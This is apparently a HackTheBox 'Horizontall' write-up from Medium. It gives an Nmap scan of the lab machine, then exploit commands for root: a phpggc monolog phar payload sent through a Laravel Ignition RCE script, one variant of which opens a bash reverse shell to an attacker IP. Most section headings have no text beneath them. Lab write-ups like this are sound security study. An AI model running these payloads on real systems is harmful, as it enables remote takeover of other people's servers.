HackTheBox — Horizontall

Nmap Scan

Starting Nmap 7.80 ( https://nmap.org ) at 2021-09-03 13:33 EET
Nmap scan report for 10.10.11.105
Host is up (0.16s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ee:77:41:43:d4:82:bd:3e:6e:6e:50:cd:ff:6b:0d:d5 (RSA)
| 256 3a:d5:89:d5:da:95:59:d9:df:01:68:37:ca:d5:10:b0 (ECDSA)
|_ 256 4a:00:04:b4:9d:29:e7:af:37:16:1b:4f:80:2d:98:94 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Did not follow redirect to http://horizontall.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

HTTP Enumeration

Initial Foothold / User

Reset The Admin Password

Code Execution

Getting Root

On the victim machine

On the attacker machine

php -d'phar.readonly=0' phpggc/phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id
python3 laravel-ignition-rce.py http://localhost:1337/ /tmp/exploit.phar
php -d'phar.readonly=0' phpggc/phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system 'bash -c "bash -i >& /dev/tcp/10.10.16.30/9001 0>&1"''
python3 laravel-ignition-rce.py http://localhost:1337/ /tmp/exploit.phar

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store